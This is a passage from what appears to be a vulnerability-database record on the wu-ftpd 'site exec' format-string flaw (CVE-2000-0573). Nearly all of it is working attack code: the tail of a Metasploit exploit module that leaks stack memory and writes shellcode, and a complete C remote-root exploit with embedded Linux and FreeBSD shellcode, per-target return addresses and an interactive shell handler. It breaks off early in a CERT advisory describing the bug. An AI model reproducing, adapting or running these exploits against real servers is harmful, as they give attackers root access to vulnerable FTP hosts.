connect_login\r\n\r\n\t\t# We just want the banner to check against our targets..\r\n\t\tprint_status(\"FTP Banner: #{banner.strip}\")\r\n\t\tstatus = Exploit::CheckCode::Safe\r\n\t\tif banner =~ /Version wu-2\\.(4|5)/\r\n\t\t\tstatus = Exploit::CheckCode::Appears\r\n\t\telsif banner =~ /Version wu-2\\.6\\.0/\r\n\t\t\tstatus = Exploit::CheckCode::Appears\r\n\t\tend\r\n\r\n\t\t# If we've made it this far, we care if login succeeded.\r\n\t\tif (ret)\r\n\t\t\t# NOTE: vulnerable and exploitable might not mean the same thing here :)\r\n\t\t\tif not fmtstr_detect_vulnerable\r\n\t\t\t\tstatus = Exploit::CheckCode::Safe\r\n\t\t\tend\r\n\t\t\tif not fmtstr_detect_exploitable\r\n\t\t\t\tstatus = Exploit::CheckCode::Safe\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\tdisconnect\r\n\t\treturn status\r\n\tend\r\n\r\n\r\n\tdef exploit\r\n\r\n\t\tif (not connect_login)\r\n\t\t\traise RuntimeError, 'Unable to authenticate'\r\n\t\tend\r\n\r\n\t\t# Use a copy of the target\r\n\t\tmytarget = target\r\n\r\n\t\tif (target['auto'])\r\n\t\t\tmytarget = nil\r\n\r\n\t\t\tprint_status(\"Automatically detecting the target...\")\r\n\t\t\tif (banner and (m = banner.match(/\\(Version wu-(.*)\\) ready/))) then\r\n\t\t\t\tprint_status(\"FTP Banner: #{banner.strip}\")\r\n\t\t\t\tversion = m[1]\r\n\t\t\telse\r\n\t\t\t\traise RuntimeError, \"No matching target\"\r\n\t\t\tend\r\n\r\n\t\t\tregexp = Regexp.escape(version)\r\n\t\t\tself.targets.each do |t|\r\n\t\t\t\tif (t.name =~ /#{regexp}/) then\r\n\t\t\t\t\tmytarget = t\r\n\t\t\t\t\tbreak\r\n\t\t\t\tend\r\n\t\t\tend\r\n\r\n\t\t\tif (not mytarget)\r\n\t\t\t\traise RuntimeError, \"No matching target\"\r\n\t\t\tend\r\n\r\n\t\t\tprint_status(\"Selected Target: #{mytarget.name}\")\r\n\t\telse\r\n\t\t\tprint_status(\"Trying target #{mytarget.name}...\")\r\n\t\t\tif banner\r\n\t\t\t\tprint_status(\"FTP Banner: #{banner.strip}\")\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\t# proceed with chosen target...\r\n\r\n\t\t# detect stuff!\r\n\t\tif mytarget.name == \"Debug\"\r\n\t\t\t#fmtstr_set_caps(true, true)\r\n\t\t\t# dump the stack, so we can detect stuff magically\r\n\t\t\tprint_status(\"Dumping the stack...\")\r\n\t\t\tstack = Array.new\r\n\t\t\textra = \"aaaabbbb\"\r\n\t\t\t1000.times do |x|\r\n\t\t\t\tdw = fmtstr_stack_read(x+1, extra)\r\n\t\t\t\tbreak if not dw\r\n\t\t\t\tstack << dw\r\n\t\t\tend\r\n\r\n\t\t\tstack_data = stack.pack('V*')\r\n\t\t\tprint_status(\"Obtained #{stack.length*4} bytes of stack data:\\n\" + Rex::Text.to_hex_dump(stack_data))\r\n\r\n\t\t\t# detect the number of pad bytes\r\n\t\t\tidx = stack_data.index(\"aaaabbbb\")\r\n\t\t\tif not idx\r\n\t\t\t\traise RuntimeError, \"Whoa, didn't find the static bytes on the stack!\"\r\n\t\t\tend\r\n\t\t\tnum_pad = 0\r\n\t\t\tnum_pad = 4 - (idx % 4) if (idx % 4) > 0\r\n\t\t\tmytarget.opts['PadBytes'] = num_pad\r\n\r\n\t\t\t# calculate the number of pops needed to hit our addr\r\n\t\t\tnum_pops = (idx + num_pad) / 4\r\n\t\t\tmytarget.opts['NumPops'] = num_pops\r\n\t\telse\r\n\t\t\tnum_pad = mytarget['PadBytes']\r\n\t\t\tnum_pops = mytarget['NumPops']\r\n\t\t\tsc_loc = mytarget['Writable']\r\n\t\t\tret = mytarget['FlowHook']\r\n\t\tend\r\n\r\n\t\tprint_status(\"Number of pad bytes: #{num_pad}\")\r\n\t\tprint_status(\"Number of pops: #{num_pops}\")\r\n\r\n\t\t# debugging -> don't try it!\r\n\t\treturn if mytarget.name == \"Debug\"\r\n\r\n\t\t#print_status(\"ATTACH!\")\r\n\t\t#select(nil,nil,nil,5)\r\n\r\n\t\tfmtstr_detect_caps\r\n\r\n\t\t# compute the stack return address using the fmt to leak memory\r\n\t\taddr_pops = mytarget['AddrPops']\r\n\t\toffset = mytarget['Offset']\r\n\t\tif addr_pops > 0\r\n\t\t\tstackaddr = fmtstr_stack_read(addr_pops)\r\n\t\t\tprint_status(\"Read %#x from offset %d\" % [stackaddr, addr_pops])\r\n\t\t\tret = stackaddr + offset\r\n\t\tend\r\n\r\n\t\tprint_status(\"Writing shellcode to: %#x\" % sc_loc)\r\n\t\tprint_status(\"Hijacking control via %#x\" % ret)\r\n\r\n\r\n\t\t# no extra bytes before the padding..\r\n\t\tnum_start = 0\r\n\r\n\t\t# write shellcode to 'writable'\r\n\t\tarr = fmtstr_gen_array_from_buf(sc_loc, payload.encoded, mytarget)\r\n\r\n\t\t# process it in groups of 24 (max ~400 bytes per command)\r\n\t\tsc_num = 1\r\n\t\twhile arr.length > 0\r\n\t\t\tprint_status(\"Sending part #{sc_num} of the payload...\")\r\n\t\t\tsc_num += 1\r\n\r\n\t\t\tnarr = arr.slice!(0..24)\r\n\r\n\t\t\tfmtbuf = fmtstr_gen_from_array(num_start, narr, mytarget)\r\n\t\t\t# a space allows the next part to start with a '/'\r\n\t\t\tfmtbuf[num_pad-1,1] = \" \"\r\n\t\t\tfmtbuf.gsub!(/\\xff/, \"\\xff\\xff\")\r\n\t\t\tif ((res = send_cmd(['SITE', 'EXEC', fmtbuf], true)))\r\n\t\t\t\tif res[0,4] == \"500 \"\r\n\t\t\t\t\traise RuntimeError, \"Crap! Something went wrong when uploading the payload...\"\r\n\t\t\t\tend\r\n\t\t\tend\r\n\t\tend\r\n\r\n\r\n\t\t# write 'writable' addr to flowhook (execute shellcode)\r\n\t\t# NOTE: the resulting two writes must be done at the same time\r\n\t\tprint_status(\"Attempting to write %#x to %#x..\" % [sc_loc, ret])\r\n\r\n\t\tfmtbuf = generate_fmt_two_shorts(num_start, ret, sc_loc, mytarget)\r\n\t\t# a space allows the next part to start with a '/'\r\n\t\tfmtbuf[num_pad-1,1] = \" \"\r\n\t\tfmtbuf.gsub!(/\\xff/, \"\\xff\\xff\")\r\n\t\t# don't wait for the response here :)\r\n\t\tres = send_cmd(['SITE', 'EXEC', fmtbuf], false)\r\n\r\n\t\tprint_status(\"Your payload should have executed now...\")\r\n\t\thandler\r\n\tend\r\n\r\n\r\n\t#\r\n\t# these two functions are used to read stack memory\r\n\t# (used by fmtstr_stack_read()\r\n\t#\r\n\tdef trigger_fmt(fmtstr)\r\n\t\treturn nil if fmtstr.length >= (512 - (4+1 + 4+1 + 2 + 2))\r\n\t\tsend_cmd(['SITE', 'EXEC', 'x', fmtstr], true)\r\n\tend\r\n\r\n\tdef extract_fmt_output(res)\r\n\t\tif (res =~ /^5.. /)\r\n\t\t\t#throw \"Crap! Something went wrong while dumping the stack...\"\r\n\t\t\treturn nil\r\n\t\tend\r\n\t\tret = res.strip.split(/\\r?\\n/)[0]\r\n\t\tret = ret[6,ret.length]\r\n\t\treturn ret\r\n\tend\r\n\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16311/"}, {"lastseen": "2016-01-31T11:55:18", "description": "wu-ftpd 2.6.0 Remote Root Exploit. CVE-2000-0573. Remote exploits for multiple platform", "published": "2000-11-21T00:00:00", "type": "exploitdb", "title": "wu-ftpd 2.6.0 - Remote Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2000-0573"], "modified": "2000-11-21T00:00:00", "id": "EDB-ID:201", "href": "https://www.exploit-db.com/exploits/201/", "sourceData": "/*\r\n * (c) 2000 venglin / b0f\r\n * http://b0f.freebsd.lublin.pl\r\n *\r\n * WUFTPD 2.6.0 REMOTE ROOT EXPLOIT (22/06/2000, updated: 05/08/2000)\r\n *\r\n * Idea and preliminary version of exploit by tf8\r\n *\r\n * Greetz: Lam3rZ, TESO, ADM, lcamtuf, karpio.\r\n * Dedicated to ksm.\r\n *\r\n * **PRIVATE**DO*NOT*DISTRIBUTE**\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <stdarg.h>\r\n#include <string.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <netdb.h>\r\n#include <unistd.h>\r\n#include <arpa/inet.h>\r\n\r\n\r\n#define repln\tif (getreply(0) < 0) return -1\r\n#define replv\tif (getreply(1) < 0) return -1\r\n\r\n#ifdef DEBUG\r\n#define repl replv\r\n#else\r\n#define repl repln\r\n#endif\r\n\r\nchar usage[] = \"usage: bobek [-l login] [-o port] [-f retofs] [-s retlocofs]\\n\\t<-t type> <hostname>\";\r\nchar recvbuf[BUFSIZ], sendbuf[BUFSIZ];\r\nFILE *cin, *cout;\r\n\r\nchar linuxcode[]= /* Lam3rZ chroot() code */\r\n\t\"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\xb0\\x46\\xcd\\x80\\x31\\xc0\\x31\\xdb\"\r\n\t\"\\x43\\x89\\xd9\\x41\\xb0\\x3f\\xcd\\x80\\xeb\\x6b\\x5e\\x31\\xc0\\x31\"\r\n\t\"\\xc9\\x8d\\x5e\\x01\\x88\\x46\\x04\\x66\\xb9\\xff\\x01\\xb0\\x27\\xcd\"\r\n\t\"\\x80\\x31\\xc0\\x8d\\x5e\\x01\\xb0\\x3d\\xcd\\x80\\x31\\xc0\\x31\\xdb\"\r\n\t\"\\x8d\\x5e\\x08\\x89\\x43\\x02\\x31\\xc9\\xfe\\xc9\\x31\\xc0\\x8d\\x5e\"\r\n\t\"\\x08\\xb0\\x0c\\xcd\\x80\\xfe\\xc9\\x75\\xf3\\x31\\xc0\\x88\\x46\\x09\"\r\n\t\"\\x8d\\x5e\\x08\\xb0\\x3d\\xcd\\x80\\xfe\\x0e\\xb0\\x30\\xfe\\xc8\\x88\"\r\n\t\"\\x46\\x04\\x31\\xc0\\x88\\x46\\x07\\x89\\x76\\x08\\x89\\x46\\x0c\\x89\"\r\n\t\"\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xb0\\x0b\\xcd\\x80\\x31\\xc0\\x31\"\r\n\t\"\\xdb\\xb0\\x01\\xcd\\x80\\xe8\\x90\\xff\\xff\\xff\\x30\\x62\\x69\\x6e\"\r\n\t\"\\x30\\x73\\x68\\x31\\x2e\\x2e\\x31\\x31\\x76\\x65\\x6e\\x67\\x6c\\x69\"\r\n\t\"\\x6e\\x40\\x6b\\x6f\\x63\\x68\\x61\\x6d\\x2e\\x6b\\x61\\x73\\x69\\x65\"\r\n\t\"\\x2e\\x63\\x6f\\x6d\";\r\n\r\nchar bsdcode[] = /* Lam3rZ chroot() code rewritten for FreeBSD by venglin */\r\n\t\"\\x31\\xc0\\x50\\x50\\x50\\xb0\\x7e\\xcd\\x80\\x31\\xdb\\x31\\xc0\\x43\"\r\n\t\"\\x43\\x53\\x4b\\x53\\x53\\xb0\\x5a\\xcd\\x80\\xeb\\x77\\x5e\\x31\\xc0\"\r\n\t\"\\x8d\\x5e\\x01\\x88\\x46\\x04\\x66\\x68\\xff\\x01\\x53\\x53\\xb0\\x88\"\r\n\t\"\\xcd\\x80\\x31\\xc0\\x8d\\x5e\\x01\\x53\\x53\\xb0\\x3d\\xcd\\x80\\x31\"\r\n\t\"\\xc0\\x31\\xdb\\x8d\\x5e\\x08\\x89\\x43\\x02\\x31\\xc9\\xfe\\xc9\\x31\"\r\n\t\"\\xc0\\x8d\\x5e\\x08\\x53\\x53\\xb0\\x0c\\xcd\\x80\\xfe\\xc9\\x75\\xf1\"\r\n\t\"\\x31\\xc0\\x88\\x46\\x09\\x8d\\x5e\\x08\\x53\\x53\\xb0\\x3d\\xcd\\x80\"\r\n\t\"\\xfe\\x0e\\xb0\\x30\\xfe\\xc8\\x88\\x46\\x04\\x31\\xc0\\x88\\x46\\x07\"\r\n\t\"\\x89\\x76\\x08\\x89\\x46\\x0c\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\"\r\n\t\"\\x52\\x51\\x53\\x53\\xb0\\x3b\\xcd\\x80\\x31\\xc0\\x31\\xdb\\x53\\x53\"\r\n\t\"\\xb0\\x01\\xcd\\x80\\xe8\\x84\\xff\\xff\\xff\\x30\\x62\\x69\\x6e\\x30\"\r\n\t\"\\x73\\x68\\x31\\x2e\\x2e\\x31\\x31\\x76\\x65\\x6e\\x67\\x6c\\x69\\x6e\"\r\n\t\"\\x40\\x6b\\x6f\\x63\\x68\\x61\\x6d\\x2e\\x6b\\x61\\x73\\x69\\x65\\x2e\"\r\n\t\"\\x63\\x6f\\x6d\";\r\n\r\nstruct platforms\r\n{\r\n\tchar *os;\r\n\tchar *version;\r\n\tchar *code;\r\n\tint align;\r\n\tint eipoff;\r\n\tlong ret;\r\n\tlong retloc;\r\n\tint sleep;\r\n};\r\n\r\nstruct platforms targ[] =\r\n{\r\n\t{ \"FreeBSD 3.4-STABLE\", \"2.6.0-ports\", bsdcode, 2, 1024, 0x80b1f10, 0xbfbfcc04, 0 },\r\n\t{ \"FreeBSD 5.0-CURRENT\", \"2.6.0-ports\", bsdcode, 2, 1024, 0x80b1510, 0xbfbfec0c, 0 },\r\n\t{ \"FreeBSD 3.4-STABLE\", \"2.6.0-packages\", bsdcode, 2, 1024, 0x80b1510, 0xbfbfe798, 0 },\r\n\t{ \"FreeBSD 3.4-STABLE\", \"2.6.0-venglin\", bsdcode, 2, 1024, 0x807078c, 0xbfbfcc04, 0 },\r\n\t{ \"RedHat Linux 6.2\", \"2.6.0-RPM\", linuxcode, 2, 1024, 0x80759e0, 0xbfffcf74, 0 },\r\n\t{ \"RedHat Linux 6.2\", \"2.6.0-RPM\", linuxcode, 2, 1024, 0x80759e0, 0xbfffd074, 0 },\r\n\t{ \"RedHat Linux 6.2\", \"2.6.0-RPM\", linuxcode, 2, 1024, 0x80759e0, 0xbfffcf84, 0 },\r\n\t{ \"RedHat Linux 6.2\", \"2.6.0-RPM\", linuxcode, 2, 1024, 0x80759e0, 0xbfffd04c, 0 },\r\n\t{ \"RedHat Linux 6.2-SMP\", \"2.6.0-RPM\", linuxcode, 2, 1024, 0x80759e0, 0xbfffd0e4, 0 },\r\n\t{ NULL, NULL, NULL, 0, 0, 0, 0 }\r\n};\r\n\r\nlong getip(name)\r\nchar *name;\r\n{\r\n\tstruct hostent *hp;\r\n\tlong ip;\r\n\textern int h_errno;\r\n\r\n\tif ((ip = inet_addr(name)) < 0)\r\n\t{\r\n\t\tif (!(hp = gethostbyname(name)))\r\n\t\t{\r\n\t\t\tfprintf(stderr, \"gethostbyname(): %s\\n\",\r\n\t\t\t\tstrerror(h_errno));\r\n\t\t\texit(1);\r\n\t\t}\r\n\t\tmemcpy(&ip, (hp->h_addr), 4);\r\n\t}\r\n\r\n\treturn ip;\r\n}\r\n\r\nint connecttoftp(host, port)\r\nchar *host;\r\nint port;\r\n{\r\n\tint sockfd;\r\n\tstruct sockaddr_in cli;\r\n\r\n\tbzero(&cli, sizeof(cli));\r\n\tcli.sin_family = AF_INET;\r\n\tcli.sin_addr.s_addr=getip(host);\r\n\tcli.sin_port = htons(port);\r\n\r\n\tif((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)\r\n\t{\r\n\t\tperror(\"socket\");\r\n\t\treturn -1;\r\n\t}\r\n\r\n\tif(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0) \r\n\t{\r\n perror(\"connect\");\r\n\t\tclose(sockfd);\r\n\t\treturn -1;\r\n\t}\r\n\r\n\tcin = fdopen(sockfd, \"r\");\r\n\tcout = fdopen(sockfd, \"w\");\r\n\r\n\tif (!cin || !cout)\r\n\t{\r\n\t\tclose(sockfd);\r\n\t\treturn -1;\r\n\t}\r\n\r\n\treturn sockfd;\r\n}\r\n\r\nint command(const char *fmt, ...)\r\n{\r\n\tchar buf1[BUFSIZ], buf2[BUFSIZ*2], *p, *q;\r\n\r\n\tva_list args;\r\n\r\n\tif (!cout)\r\n\t\treturn -1;\r\n\r\n\tbzero(buf1, BUFSIZ);\r\n\tbzero(buf2, BUFSIZ*2);\r\n\r\n\tva_start(args, fmt);\r\n\tvsnprintf(buf1, BUFSIZ, fmt, args);\r\n\tva_end(args);\r\n\r\n\tfor (p=buf1,q=buf2;*p;p++,q++)\r\n\t{\r\n\t\tif (*p == '\\xff')\r\n\t\t{\r\n\t\t\t*q++ = '\\xff';\r\n\t\t\t*q = '\\xff';\r\n\t\t}\r\n\t\telse\r\n\t\t\t*q = *p;\r\n\t}\r\n\r\n\tfprintf(cout, \"%s\", buf2);\r\n\r\n#ifdef DEBUG\r\n\tfprintf(stderr, \"--> \");\r\n\tfprintf(stderr, \"%s\", buf2);\r\n\tfputc('\\n', stderr);\r\n#endif\r\n\r\n\tfputs(\"\\r\\n\", cout);\r\n\t(void)fflush(cout);\r\n\treturn 0;\r\n}\r\n\r\nint getreply(v)\r\nint v;\r\n{\r\n\tif (!(fgets(recvbuf, BUFSIZ, cin)))\r\n\t\treturn -1;\r\n\r\n\tif (v)\r\n\t\tfprintf(stderr, \"<-- %s\", recvbuf);\r\n\r\n\treturn 0;\r\n}\r\n\r\nint logintoftp(login, passwd)\r\nchar *login, *passwd;\r\n{\r\n\tdo\r\n\t\trepl;\r\n\twhile (strncmp(recvbuf, \"220 \", 4));\r\n\r\n\tif ((command(\"USER %s\", login)) < 0)\r\n\t\treturn -1;\r\n\r\n\trepl;\r\n\r\n\tif (strncmp(recvbuf, \"331\", 3))\r\n\t{\r\n\t\tputs(recvbuf);\r\n\t\treturn -1;\r\n\t}\r\n\r\n\tif ((command(\"PASS %s\", passwd) < 0))\r\n\t\treturn -1;\r\n\r\n\tdo\r\n\t\trepl;\r\n\twhile (strncmp(recvbuf, \"230 \", 4));\r\n\r\n\treturn 0;\r\n}\r\n\r\nint checkvuln(void)\r\n{\r\n\tcommand(\"SITE EXEC %%p\");\r\n\trepl;\r\n\r\n\tif(strncmp(recvbuf, \"200-\", 4))\r\n\t\treturn -1;\r\n\r\n\tif(strncmp(recvbuf+4, \"0x\", 2))\r\n\t\treturn -1;\r\n\r\n\trepl;\r\n\r\n\treturn 0;\r\n}\r\n\r\nint findeip(eipoff, align)\r\nint eipoff, align;\r\n{\r\n\tint i, j, off;\r\n\tchar *p1;\r\n\tchar eip1[10], eip2[10];\r\n\r\n\tfor (i=eipoff;;i+=8)\r\n\t{\r\n\t\tfprintf(stderr, \"at offset %d\\n\", i);\r\n\t\tstrcpy(sendbuf, \"SITE EXEC \");\r\n \r\n\t\tfor (j=0;j<align;j++) strcat(sendbuf, \"a\");\r\n\t\tstrcat(sendbuf, \"abcd\");\r\n\r\n\t\tfor (j=0;j<eipoff/8;j++) strcat(sendbuf, \"%%.f\");\r\n\t\tfor (j=0;j<(i-eipoff)/8;j++) strcat(sendbuf, \"%%d%%d\");\r\n\t\tstrcat(sendbuf, \"|%%.8x|%%.8x\");\r\n\r\n\t\tif (command(sendbuf) < 0)\r\n\t\t\treturn -1;\r\n\r\n\t\trepl;\r\n\r\n\t\tif (!(p1 = strchr(recvbuf, '|')))\r\n\t\t\treturn -1;\r\n\r\n\t\tstrncpy(eip1, p1+1, 8);\r\n\t\tstrncpy(eip2, p1+10, 8);\r\n\r\n\t\teip1[8] = eip2[8] = '\\0';\r\n\r\n\t\tif (!(strcmp(eip1, \"64636261\")))\r\n\t\t{\r\n\t\t\toff = i;\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\tif (!(strcmp(eip2, \"64636261\")))\r\n\t\t{\r\n\t\t\toff = i + 4;\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\trepl;\r\n\t}\r\n\r\n\trepl;\r\n\r\n\treturn off;\r\n}\r\n\r\nchar *putshell(type)\r\nint type;\r\n{\r\n\tstatic char buf[400];\r\n\tint noplen;\r\n\r\n\tchar *code = targ[type].code;\r\n\r\n\tnoplen = sizeof(buf) - strlen(code) - 2;\r\n\r\n\tmemset(buf, 0x90, noplen);\r\n\tbuf[noplen+1] = '\\0';\r\n\tstrcat(buf, code);\r\n\r\n\treturn buf;\r\n}\r\n\r\nint overwrite(ptr, off, align, retloc, eipoff)\r\nlong ptr, retloc;\r\nint off, align, eipoff;\r\n{\r\n\tint i, size = 0;\r\n\tchar buf[100];\r\n\r\n\tfprintf(stderr, \"RET: %p, RET location: %p,\"\r\n\t\t\" RET location offset on stack: %d\\n\",\r\n\t\t(void *)ptr, (void *)retloc, off);\r\n\r\n\tif (off >= 12)\r\n\t{\r\n\r\n\t\tstrcpy(sendbuf, \"SITE EXEC \");\r\n\r\n\t\tfor (i=0;i<eipoff/8;i++) strcat(sendbuf, \"%%.f\");\r\n\t\tfor (i=0;i<(off-eipoff-8)/8;i++) strcat(sendbuf, \"%%d%%d\");\r\n\r\n\t\tif (((off-eipoff-8) % 8) != 0) strcat(sendbuf, \"%%d%%d\");\r\n\r\n\t\tif (command(sendbuf) < 0)\r\n\t\t\treturn -1;\t\r\n\r\n\t\trepl;\r\n\r\n\t\tsize = strlen(recvbuf+4) - 2;\r\n\r\n\t\trepl;\r\n\t}\r\n\r\n\tfprintf(stderr, \"Reply size: %d, New RET: %p\\n\", size,\r\n\t\t(void *)(ptr-size));\r\n\r\n\tstrcpy(sendbuf, \"SITE EXEC \");\r\n\tfor (i=0;i<align;i++) strcat(sendbuf, \"a\");\r\n\r\n\tsprintf(buf, \"%c%c%c%c\", ((int)retloc & 0xff),\r\n\t\t(((int)retloc & 0xff00) >> 8),\r\n\t\t(((int)retloc & 0xff0000) >> 16),\r\n\t\t(((int)retloc & 0xff000000) >> 24));\r\n\r\n\tstrcat(sendbuf, buf);\r\n\r\n\tfor (i=0;i<eipoff/8;i++) strcat(sendbuf, \"%%.f\");\r\n\tfor (i=0;i<(off-eipoff-8)/8;i++) strcat(sendbuf, \"%%d%%d\");\r\n\r\n\tif (((off-eipoff-8) % 8) != 0) strcat(sendbuf, \"%%d%%d\");\r\n\r\n\tstrcat(sendbuf, \"%%.\");\r\n\tsprintf(buf, \"%d\", (int)ptr-size);\r\n\tstrcat(sendbuf, buf);\r\n\tstrcat(sendbuf, \"d%%n\");\r\n\r\n\tif (command(sendbuf) < 0)\r\n\t\treturn -1;\r\n\r\n\treturn 0;\r\n}\r\n\r\nint sh(sockfd)\r\nint sockfd;\r\n{\r\n\tchar buf[BUFSIZ];\r\n\tint c;\r\n\tfd_set rf, drugi;\r\n\tchar cmd[] = \"uname -a ; pwd ; id\\n\";\r\n \r\n\tFD_ZERO(&rf);\r\n\tFD_SET(0, &rf);\r\n\tFD_SET(sockfd, &rf);\r\n\twrite(sockfd, cmd, strlen(cmd));\r\n\r\n\twhile (1)\r\n\t{\r\n\t\tbzero(buf, BUFSIZ);\r\n\t\tmemcpy (&drugi, &rf, sizeof(rf));\r\n\t\tselect(sockfd+1, &drugi, NULL, NULL, NULL);\r\n\t\tif (FD_ISSET(0, &drugi))\r\n\t\t{\r\n\t\t\tc = read(0, buf, BUFSIZ);\r\n\t\t\tsend(sockfd, buf, c, 0x4);\r\n\t\t}\r\n\r\n\t\tif (FD_ISSET(sockfd, &drugi))\r\n\t\t{\r\n\t\t\tc = read(sockfd, buf, BUFSIZ);\r\n\t\t\tif (c<0) return 0;\r\n\t\t\twrite(1,buf,c);\r\n\t\t}\r\n\t}\r\n}\r\n\r\nint main(argc, argv)\r\nint argc;\r\nchar **argv;\r\n{\r\n\textern int optind, opterr;\r\n\textern char *optarg;\r\n\tint ch, type, port, eipoff, fd, retofs, retlocofs, align, i, retoff;\r\n\tlong ret, retloc;\r\n\tchar login[BUFSIZ], password[BUFSIZ];\r\n\r\n\topterr = retofs = retlocofs = 0;\r\n\tstrcpy(login, \"ftp\");\r\n\ttype = -1;\r\n\tport = 21;\r\n\r\n\twhile ((ch = getopt(argc, argv, \"l:f:s:t:o\")) != -1)\r\n\t\tswitch((char)ch)\t\r\n\t\t{\r\n\t\t\tcase 'l':\r\n\t\t\t\tstrcpy(login, optarg);\r\n\t\t\t\tbreak;\r\n\r\n\t\t\tcase 't':\r\n\t\t\t\ttype = atoi(optarg);\r\n\t\t\t\tbreak;\r\n\r\n\t\t\tcase 'o':\r\n\t\t\t\tport = atoi(optarg);\r\n\t\t\t\tbreak;\r\n\r\n\t\t\tcase 'f':\r\n\t\t\t\tretofs = atoi(optarg);\r\n\t\t\t\tbreak;\r\n\r\n\t\t\tcase 's':\r\n\t\t\t\tretlocofs = atoi(optarg);\r\n\t\t\t\tbreak;\r\n\r\n\t\t\tcase '?':\r\n\t\t\tdefault:\r\n\t\t\t\tputs(usage);\r\n\t\t\t\texit(0);\r\n\t\t}\r\n\r\n\targc -= optind;\r\n\targv += optind;\r\n\r\n\tfprintf(stderr, \"PanBobek v1.1 by venglin@freebsd.lublin.pl\\n\\n\");\r\n\r\n\tif (type < 0)\r\n\t{\r\n\t\tfprintf(stderr, \"Please select platform:\\n\");\r\n\t\tfor (i=0;targ[i].os;i++)\r\n\t\t{\r\n\t\t\tfprintf(stderr, \"\\t-t %d : %s %s (%p / %p)\\n\", i,\r\n\t\t\t\ttarg[i].os, targ[i].version,\r\n\t\t\t\t(void *)targ[i].ret,\r\n\t\t\t\t(void *)targ[i].retloc);\r\n\t\t}\r\n\t\texit(0);\r\n\t}\r\n\r\n\tfprintf(stderr, \"Selected platform: %s with WUFTPD %s\\n\\n\",\r\n\t\ttarg[type].os, targ[type].version);\r\n\r\n\teipoff = targ[type].eipoff;\r\n\talign = targ[type].align;\r\n\tret = targ[type].ret;\r\n\tretloc = targ[type].retloc;\r\n\tretloc += retlocofs;\r\n\tret += retofs;\r\n\r\n\tif (argc != 1)\r\n\t{\r\n\t\tputs(usage);\r\n\t\texit(0);\r\n\t}\r\n\r\n\tstrcpy(password, putshell(type));\r\n\r\n\tif ((fd = connecttoftp(*argv, port)) < 0)\r\n\t{ \r\n\t\t(void)fprintf(stderr, \"Connection to %s failed.\\n\", *argv);\r\n\t\texit(1);\r\n\t}\r\n\r\n\t(void)fprintf(stderr, \"Connected to %s. Trying to log in.\\n\", *argv);\r\n\r\n\tif (logintoftp(login, password) < 0)\r\n\t{\r\n\t\t(void)fprintf(stderr, \"Logging in to %s (%s) failed.\\n\",\r\n\t\t\t*argv, login);\r\n\t\texit(1);\r\n }\r\n\r\n\t(void)fprintf(stderr, \"Logged in as %s. Checking vulnerability.\\n\",\r\n\t\tlogin);\r\n\r\n\tsleep(targ[type].sleep);\r\n\r\n\tif (checkvuln() < 0)\r\n\t{\r\n\t\t(void)fprintf(stderr, \"Sorry, this version isn't\"\r\n\t\t\t\" vulnerable or uses internal vsnprintf().\\n\");\r\n\t\texit(1);\r\n\t}\r\n\r\n\t(void)fprintf(stderr, \"Ok, trying to find offset (initial: %d)\\n\",\r\n\t\teipoff);\r\n\r\n\tif ((retoff = findeip(eipoff, align)) < 0)\r\n\t{\r\n\t\t(void)fprintf(stderr, \"\\nError finding offset. Adjust\"\r\n\t\t\t\" align.\\n\");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tif (overwrite(ret, retoff, align, retloc, eipoff) < 0)\r\n\t{\r\n\t\t(void)fprintf(stderr, \"Error overwriting RET addr.\\n\");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tfprintf(stderr, \"Wait up to few minutes for reply. It depends on \"\r\n\t\t\t\"victim's CPU speed.\\nEnjoy your shell.\\n\");\r\n\r\n\tsh(fd);\r\n\r\n\texit(0);\r\n}\r\n\n\n// milw0rm.com [2000-11-21]\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/201/"}], "cert": [{"lastseen": "2020-09-18T20:45:09", "bulletinFamily": "info", "cvelist": ["CVE-2000-0573"], "description": "### Overview \n\nA vulnerability involving an input validation error in the \"site exec\" command has recently been identified in the Washington University ftpd (wu-ftpd) software package. Sites running affected systems are advised to update their wu-ftpd software as soon as possible. \n\nA similar but distinct vulnerability has also been identified that involves a missing format string in several setproctitle() calls. It affects a broader number of ftp daemons. Please see the vendor section of this document for specific information about the status of specific ftpd implementations and solutions. \n\n### Description \n\n**\"Site exec\" Vulnerability**\n\n \nA vulnerability has been identified in wu-ftpd and other ftp daemons based on the wu-ftpd source code. Wu-ftpd is a common package used to provide file transfer protocol (ftp) services. This vulnerability is being discussed as the wu-ftpd \"site exec\" or \"lreply\" vulnerability in various public forums. Incidents involving the exploitation of this vulnerability which enables remote users to gain root privileges have been reported to the CERT Coordination Center. \n \nThe problem is described in AUSCERT Advisory AA-2000.02, \"wu-ftpd 'site exec' Vulnerability,\" which is available from \n\n[_ftp://ftp.auscert.org.au/pub/auscert/advisory/AA-2000.02_](<ftp://ftp.auscert.org.au/pub/auscert/advisory/AA-2000.02>) \nThe wu-ftpd \"site exec\" vulnerability is the result of missing character-formatting argument in several function calls that implement the \"site exec\" command functionality. Normally if \"site exec\" is enabled, a user logged into an ftp server (including the 'ftp' or 'anonymous' user) may execute a restricted subset of quoted commands on the server itself. However, if a malicious user can pass character format strings consisting of carefully constructed *printf() conversion characters (%f, %p, %n, etc) while executing a \"site exec\" command, the ftp daemon may be tricked into executing arbitrary code as root. \n \nThe \"site exec\" vulnerability appears to have been in the wu-ftpd code since the original wu-ftpd 2.0 came out in 1993. Any vendors who have based their own ftpd distributions on this vulnerable code are also likely to be 